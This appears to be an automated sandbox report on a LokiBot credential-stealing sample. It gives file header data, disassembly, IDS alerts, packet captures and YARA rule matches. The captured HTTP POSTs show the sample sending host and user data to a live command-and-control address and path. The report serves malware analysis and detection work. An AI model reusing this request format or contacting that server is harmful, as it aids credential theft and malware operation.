DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5ADE6050 [Mon Apr 23 22:38:08 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x40b24	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x42000	0x5ad08	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x3eb84	0x3ec00	0e3606c7a65c4c7be1f25d2cffede6d0	False	0.9536035545318725	data	7.926771545548548	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x42000	0x5ad08	0x5ae00	67f021f46d18a073f554ac85adf54aa3	False	0.034146105570839067	data	2.4978018859323337	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9e000	0xc	0x200	191bae2bb0627c90cdbed2988d283a05	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x42220	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.31560283687943264
RT_ICON	0x42688	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.1578330206378987
RT_ICON	0x43730	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.1449170124481328
RT_ICON	0x45cd8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	0.07723193197921586
RT_ICON	0x49f00	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	0.04204128711699988
RT_ICON	0x5a728	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336	0.01977246501168743
RT_GROUP_ICON	0x9c750	0x5a	data	0.7333333333333333
RT_VERSION	0x9c7ac	0x36a	data	0.4073226544622426
RT_MANIFEST	0x9cb18	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-30T08:11:57.355228+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49732	80	192.168.2.4	89.34.237.212
2024-08-30T08:11:57.355228+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49732	80	192.168.2.4	89.34.237.212
2024-08-30T08:11:57.355228+0200	TCP	2825766	ETPRO MALWARE LokiBot Checkin M2	1	49732	80	192.168.2.4	89.34.237.212
2024-08-30T08:11:58.159945+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49733	80	192.168.2.4	89.34.237.212
2024-08-30T08:11:58.159945+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49733	80	192.168.2.4	89.34.237.212
2024-08-30T08:11:58.159945+0200	TCP	2825766	ETPRO MALWARE LokiBot Checkin M2	1	49733	80	192.168.2.4	89.34.237.212
2024-08-30T08:11:58.011635+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49732	80	192.168.2.4	89.34.237.212
2024-08-30T08:11:58.011635+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49732	80	192.168.2.4	89.34.237.212
2024-08-30T08:11:56.116406+0200	TCP	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	49730	80	192.168.2.4	89.34.237.212
2024-08-30T08:11:57.290515+0200	TCP	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	49731	80	192.168.2.4	89.34.237.212
2024-08-30T08:11:56.627184+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49731	80	192.168.2.4	89.34.237.212
2024-08-30T08:11:56.627184+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49731	80	192.168.2.4	89.34.237.212
2024-08-30T08:11:56.627184+0200	TCP	2825766	ETPRO MALWARE LokiBot Checkin M2	1	49731	80	192.168.2.4	89.34.237.212
2024-08-30T08:11:58.794071+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49733	80	192.168.2.4	89.34.237.212
2024-08-30T08:11:58.794071+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49733	80	192.168.2.4	89.34.237.212
2024-08-30T08:11:55.466017+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49730	80	192.168.2.4	89.34.237.212
2024-08-30T08:11:55.466017+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49730	80	192.168.2.4	89.34.237.212
2024-08-30T08:11:55.466017+0200	TCP	2825766	ETPRO MALWARE LokiBot Checkin M2	1	49730	80	192.168.2.4	89.34.237.212

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 30, 2024 08:11:55.454056978 CEST	49730	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:55.459024906 CEST	80	49730	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:55.459104061 CEST	49730	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:55.461178064 CEST	49730	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:55.465971947 CEST	80	49730	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:55.466017008 CEST	49730	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:55.470871925 CEST	80	49730	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:56.116147995 CEST	80	49730	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:56.116350889 CEST	80	49730	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:56.116405964 CEST	49730	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:56.118422031 CEST	49730	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:56.123207092 CEST	80	49730	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:56.615358114 CEST	49731	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:56.620209932 CEST	80	49731	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:56.620311975 CEST	49731	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:56.622282982 CEST	49731	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:56.627106905 CEST	80	49731	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:56.627183914 CEST	49731	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:56.631968021 CEST	80	49731	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:57.290396929 CEST	80	49731	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:57.290514946 CEST	49731	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:57.290795088 CEST	80	49731	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:57.290841103 CEST	49731	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:57.299138069 CEST	80	49731	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:57.343602896 CEST	49732	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:57.348439932 CEST	80	49732	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:57.348511934 CEST	49732	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:57.350445986 CEST	49732	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:57.355184078 CEST	80	49732	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:57.355227947 CEST	49732	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:57.359988928 CEST	80	49732	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:58.011451960 CEST	80	49732	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:58.011635065 CEST	49732	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:58.011921883 CEST	80	49732	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:58.011971951 CEST	49732	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:58.016372919 CEST	80	49732	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:58.148273945 CEST	49733	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:58.153058052 CEST	80	49733	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:58.153153896 CEST	49733	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:58.155111074 CEST	49733	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:58.159879923 CEST	80	49733	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:58.159945011 CEST	49733	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:11:58.164762974 CEST	80	49733	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:58.793612003 CEST	80	49733	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:58.794018030 CEST	80	49733	89.34.237.212	192.168.2.4
Aug 30, 2024 08:11:58.794070959 CEST	49733	80	192.168.2.4	89.34.237.212
Aug 30, 2024 08:12:00.550611973 CEST	49733	80	192.168.2.4	89.34.237.212

HTTP Request Dependency Graph

89.34.237.212

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	89.34.237.212	80	7304	C:\Users\user\Desktop\Mcx2Xk0fqn.exe

Timestamp	Bytes transferred	Direction	Data
Aug 30, 2024 08:11:55.461178064 CEST	244	OUT	POST /annonymous/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 89.34.237.212 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E06B0B08 Content-Length: 176 Connection: close
Aug 30, 2024 08:11:55.466017008 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones701188JONES-PCk0FDD42EE188E931437F4FBE2CKP2Kc
Aug 30, 2024 08:11:56.116147995 CEST	384	IN	HTTP/1.1 403 Forbidden Date: Fri, 30 Aug 2024 06:11:56 GMT Server: Apache Content-Length: 220 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 61 6e 6e 6f 6e 79 6d 6f 75 73 2f 66 72 65 2e 70 68 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /annonymous/fre.phpon this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	89.34.237.212	80	7304	C:\Users\user\Desktop\Mcx2Xk0fqn.exe

Timestamp	Bytes transferred	Direction	Data
Aug 30, 2024 08:11:56.622282982 CEST	244	OUT	POST /annonymous/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 89.34.237.212 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E06B0B08 Content-Length: 176 Connection: close
Aug 30, 2024 08:11:56.627183914 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones701188JONES-PC+0FDD42EE188E931437F4FBE2Cy1CDP
Aug 30, 2024 08:11:57.290396929 CEST	384	IN	HTTP/1.1 403 Forbidden Date: Fri, 30 Aug 2024 06:11:57 GMT Server: Apache Content-Length: 220 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 61 6e 6e 6f 6e 79 6d 6f 75 73 2f 66 72 65 2e 70 68 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /annonymous/fre.phpon this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	89.34.237.212	80	7304	C:\Users\user\Desktop\Mcx2Xk0fqn.exe

Timestamp	Bytes transferred	Direction	Data
Aug 30, 2024 08:11:57.350445986 CEST	244	OUT	POST /annonymous/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 89.34.237.212 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E06B0B08 Content-Length: 149 Connection: close
Aug 30, 2024 08:11:57.355227947 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones701188JONES-PC0FDD42EE188E931437F4FBE2C
Aug 30, 2024 08:11:58.011451960 CEST	384	IN	HTTP/1.1 403 Forbidden Date: Fri, 30 Aug 2024 06:11:57 GMT Server: Apache Content-Length: 220 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 61 6e 6e 6f 6e 79 6d 6f 75 73 2f 66 72 65 2e 70 68 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /annonymous/fre.phpon this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	89.34.237.212	80	7304	C:\Users\user\Desktop\Mcx2Xk0fqn.exe

Timestamp	Bytes transferred	Direction	Data
Aug 30, 2024 08:11:58.155111074 CEST	244	OUT	POST /annonymous/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 89.34.237.212 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E06B0B08 Content-Length: 149 Connection: close
Aug 30, 2024 08:11:58.159945011 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones701188JONES-PC0FDD42EE188E931437F4FBE2C
Aug 30, 2024 08:11:58.793612003 CEST	384	IN	HTTP/1.1 403 Forbidden Date: Fri, 30 Aug 2024 06:11:58 GMT Server: Apache Content-Length: 220 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 61 6e 6e 6f 6e 79 6d 6f 75 73 2f 66 72 65 2e 70 68 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /annonymous/fre.phpon this server.</p></body></html>

Target ID:	0
Start time:	02:11:53
Start date:	30/08/2024
Path:	C:\Users\user\Desktop\Mcx2Xk0fqn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Mcx2Xk0fqn.exe"
Imagebase:	0x400000
File size:	630'272 bytes
MD5 hash:	C421A43F741AD586338B3739BD812B95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1654908929.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1654908929.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1654908929.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1654908929.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1654908929.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1654908929.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1654908929.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1654908929.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1654908929.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1654908929.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1654908929.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1654908929.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1654908929.0000000003B2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1654908929.0000000003B2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1654908929.0000000003B2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1654908929.0000000003B2C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1654908929.0000000003B2C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1654908929.0000000003B2C000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1654628444.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1654628444.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1654628444.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1654628444.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1654628444.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1654628444.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:11:53
Start date:	30/08/2024
Path:	C:\Users\user\Desktop\Mcx2Xk0fqn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Mcx2Xk0fqn.exe"
Imagebase:	0xcf0000
File size:	630'272 bytes
MD5 hash:	C421A43F741AD586338B3739BD812B95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
